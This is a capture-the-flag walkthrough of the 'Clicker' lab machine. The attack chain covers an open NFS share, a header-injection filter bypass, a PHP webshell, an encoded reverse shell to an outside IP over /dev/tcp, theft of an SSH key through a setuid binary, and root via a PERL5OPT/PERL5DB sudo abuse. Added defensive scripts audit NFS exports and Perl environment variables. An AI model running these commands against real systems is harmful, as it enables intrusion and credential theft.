🖱️

Clicker

 
Open TCP ports from the nmap scan: 22, 80, 111, 2049, 39319, 41095, 46873, 48073, 60887
hosts entry: 10.129.62.93 clicker.htb
Pages found on the web application:
http://clicker.htb/login.php
http://clicker.htb/play.php
http://clicker.htb/info.php
http://clicker.htb/export.php
http://clicker.htb/register.php
Register an account ivan:123456. Session cookie after login:
PHPSESSID=2cgonbun427jaletnuemcdl8a1
 
Because the nmap scan shows NFS services open (ports 111 and 2049), let's check whether any folder can be mounted.
showmount -e 10.129.62.93
mount -t nfs 10.129.62.93:/mnt/backups /mnt -o nolock
The share contains a zip file called clicker.htb_backup.zip; copy it and unzip it in a new folder.
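The backup share above could be mounted by any client without credentials. As an added defender's check that is not part of this writeup, the following shell functions audit an /etc/exports-style file for shares exported to every host (a `*` host or no host list at all) and for entries carrying no_root_squash. The exports file is constructed for the example; the /mnt/backups line mirrors the share found on the machine.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit NFS exports for
# shares that any host may mount or that keep remote root as root.

# audit_exports FILE
#   Prints one finding per line and returns 1 if anything was flagged,
#   0 if every export is restricted to named hosts with root_squash.
audit_exports() {
    file="$1"
    findings=0
    while IFS= read -r line || [ -n "$line" ]; do
        line="${line%%#*}"              # drop comments
        set -- $line                    # word-split: path, then host(options)...
        [ $# -eq 0 ] && continue        # blank or comment-only line
        path="$1"; shift
        if [ $# -eq 0 ]; then
            echo "$path: no host list (exported to every host)"
            findings=$((findings + 1))
            continue
        fi
        for spec in "$@"; do
            host="${spec%%(*}"          # part before '('
            opts="${spec#*(}"; opts="${opts%)}"
            [ "$opts" = "$spec" ] && opts=""   # spec had no option list
            if [ "$host" = "*" ] || [ -z "$host" ]; then
                echo "$path: mountable by any host ($spec)"
                findings=$((findings + 1))
            fi
            case ",$opts," in
                *,no_root_squash,*)
                    echo "$path: no_root_squash for $host"
                    findings=$((findings + 1)) ;;
            esac
        done
    done < "$file"
    [ "$findings" -eq 0 ]
}

# make_sample_exports
#   Writes a constructed exports file and prints its path.
make_sample_exports() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample exports file (not the machine's real /etc/exports)
/mnt/backups   *(rw,sync,no_subtree_check)
/srv/shared    10.0.0.0/24(ro,sync) admin.example.internal(rw,no_root_squash)
/srv/private   10.0.0.5(rw,sync)
EOF
    echo "$f"
}

# Stand-alone demonstration on the constructed sample
sample=$(make_sample_exports)
audit_exports "$sample" || echo "review the findings above"
rm -f "$sample"
```

Expected findings on the sample are the world-mountable /mnt/backups share and the no_root_squash entry on /srv/shared; /srv/private is clean. On a real server run it as `audit_exports /etc/exports` and fold it into the host's configuration checks.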
It appears to be the source code of the Clicker web application. Inside are the credentials for the SQL database:
localhost clicker_db_user:clicker_db_password DB= clicker
 
Let's look at the close and save functions of the web app.
The word 'role' is filtered as a malicious keyword.
Let's see how to bypass the filter: header injection.
Try it out. The response is a redirection.
Log out and then log back in.
A new functionality called administration now appears.
The export path is visible in this new functionality.
The file extension of the export is determined by export.php and can be modified.
Try to access the export path: exports/top_players_bz6cuda5.php
The exported file is accessible.
In authenticate.php, the 'nickname' parameter appears to be injectable with a webshell.
Play the game again, setting the nickname parameter to the webshell.
Export it from the administration page.
http://clicker.htb/exports/top_players_82ifz4pn.php?cmd=whoami
The webshell is accessible.
http://clicker.htb/exports/top_players_82ifz4pn.php?cmd=cat%20/etc/passwd%20|%20grep%20-v%20nologin
This lists some of the server's usernames.
Create a reverse shell command, encode it with base64, then URL-encode the decoding command:
echo "sh -i >& /dev/tcp/10.10.14.12/6666 0>&1" | base64
c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNjY2NiAwPiYx
echo%20%22c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNjY2NiAwPiYx%22%20%7C%20base64%20-d%20%7C%20bash
We get the reverse shell.
After enumeration, we get into the /opt folder.
execute_query: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cad57695aba64e8b4f4274878882ead34f2b2d57, for GNU/Linux 3.2.0, not stripped
Download it and open it in Ghidra.
In the main() function, inside the switch statement, we can see the default case.
param_2 stands for the second argument; let's try it on the file.
It seems that any value for param_1 other than 0-4 reaches the default case, where the program reads a file; param_2 supplies the filename, and the file's content is read.
Note that this program seems to have the privilege to access files in the same folder, including some .sql files that are not readable with our current user's privileges.
Then, after enumeration:
./execute_query 6 ../.ssh/id_rsa
This gives us the private key for user jack's SSH authentication.
The key copied directly is not in correct OpenSSH format, so add two '-' characters to fix the format.
We get access as user jack.
jack@clicker:~$ sudo -l
Matching Defaults entries for jack on clicker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jack may run the following commands on clicker:
    (ALL : ALL) ALL
    (root) SETENV: NOPASSWD: /opt/monitor.sh

jack@clicker:~$ cat /opt/monitor.sh
#!/bin/bash
if [ "$EUID" -ne 0 ]
  then echo "Error, please run as root"
  exit
fi
set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;
data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
    exit;
else
    timestamp=$(/usr/bin/date +%s)
    /usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml
fi
Googling /usr/bin/xml_pp, we find an exploit called perl_startup.
The payload detail is:
cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "/bin/bash"' exim -ps 2>&-})
Let's go back to the target:
sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh bash -p
We get root.
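The sudo rule for /opt/monitor.sh carries the SETENV tag, so the caller's environment reaches a root-run script that invokes /usr/bin/xml_pp, a Perl program. The script unsets PERL5LIB and PERLLIB but not PERL5OPT and PERL5DB, which is exactly the gap the perl_startup technique relies on. Its `set PATH=...` line also assigns that string to the positional parameter $1 rather than to PATH, although sudo's secure_path still applies. The fix is to drop SETENV from the rule and, defensively, to have the script build the child's environment itself. As an added hardening example that is not the machine's script, the shell functions below detect and scrub interpreter-influencing variables, run a child with an explicitly built environment, and flag sudoers rules that carry SETENV. The sudoers sample is constructed, and the variable list is an assumption rather than an exhaustive one.

```shell
#!/bin/sh
# Added example, not the monitor.sh from the machine: environment hygiene for
# a privileged wrapper that calls a Perl tool such as xml_pp.

# Variables that alter perl (or the dynamic loader) before any script code
# runs. Assumed list for this example; extend it for your own interpreters.
PERL_ENV_VARS="PERL5OPT PERL5DB PERL5LIB PERLLIB PERL5SHELL PERL_UNICODE LD_PRELOAD LD_LIBRARY_PATH"

# perl_env_leaks
#   Prints the name of every listed variable that is currently set
#   (even if empty) and returns 1 if any was found, 0 if clean.
perl_env_leaks() {
    leaks=0
    for v in $PERL_ENV_VARS; do
        if eval "[ -n \"\${$v+set}\" ]"; then
            echo "$v"
            leaks=$((leaks + 1))
        fi
    done
    [ "$leaks" -eq 0 ]
}

# scrub_perl_env
#   Unsets every listed variable in the current shell.
scrub_perl_env() {
    for v in $PERL_ENV_VARS; do
        unset "$v"
    done
}

# run_clean COMMAND [ARGS...]
#   Runs the command with an explicitly built environment, so nothing the
#   sudo caller exported can reach the child regardless of the sudoers tag.
run_clean() {
    env -i PATH=/usr/sbin:/usr/bin:/sbin:/bin "$@"
}

# sudoers_setenv_rules FILE
#   Prints uncommented lines of a sudoers-style file that carry the SETENV
#   tag (reading the real /etc/sudoers needs root; a constructed file is
#   used below).
sudoers_setenv_rules() {
    grep -E '^[^#]*[[:space:]]SETENV:' "$1"
}

# make_sample_sudoers
#   Writes a constructed sudoers fragment and prints its path. The SETENV
#   line mirrors the rule shown by sudo -l above.
make_sample_sudoers() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample, not the machine's real sudoers
Defaults env_reset
jack ALL=(root) SETENV: NOPASSWD: /opt/monitor.sh
# jack ALL=(root) SETENV: NOPASSWD: /opt/old_monitor.sh
jack ALL=(root) NOPASSWD: /opt/monitor.sh
EOF
    echo "$f"
}

# Stand-alone demonstration
PERL5OPT=-d; export PERL5OPT        # constructed: mimic a caller's tampered env
perl_env_leaks || echo "dangerous variables present, scrubbing"
scrub_perl_env
perl_env_leaks && echo "environment clean"
run_clean sh -c 'echo "inside child, PERL5OPT=${PERL5OPT:-unset}"'
s=$(make_sample_sudoers)
echo "rules that let the caller set environment variables:"
sudoers_setenv_rules "$s" || echo "(none)"
rm -f "$s"
```

In a wrapper like monitor.sh, `scrub_perl_env` belongs before the `xml_pp` call, or better, `xml_pp` is started through `run_clean` so the environment is constructed rather than filtered; `sudoers_setenv_rules` is the check to run over sudoers and sudoers.d when reviewing who may run what as root.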